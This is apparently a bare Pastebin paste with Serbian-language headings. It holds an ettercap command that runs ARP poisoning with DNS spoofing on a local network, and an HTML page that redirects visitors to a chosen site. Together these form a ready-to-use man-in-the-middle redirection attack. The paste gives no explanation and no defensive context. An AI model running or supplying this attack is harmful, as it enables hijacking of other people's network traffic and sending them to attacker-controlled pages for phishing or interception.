Advertisement
Guest User

Untitled

a guest
Feb 25th, 2017
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.79 KB | None | 0 0
  1.  
  2.  
  3. ================================KOMANDA ZA REDIRECT=================================
  4.  
  5.  
  6. ettercap -T -q -M arp -P dns_spoof -i eth0
  7.  
  8.  
  9. ================================HTML ZA REDIRECT ===================================
  10.  
  11.  
  12. <!DOCTYPE HTML>
  13. <html lang="en-US">
  14. <head>
  15. <meta charset="UTF-8">
  16. <meta http-equiv="refresh" content="1; url=https://iamawesome.com">
  17. <script type="text/javascript">
  18. window.location.href = "https://iamawesome.com"
  19. </script>
  20. <title>Page Redirection</title>
  21. </head>
  22. <body>
  23. <!-- Note: don't tell people to `click` the link, just tell them that it is a link. -->
  24. If you are not redirected automatically, follow this <a href='https://iamawesome.com'>link to example</a>.
  25. </body>
  26. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement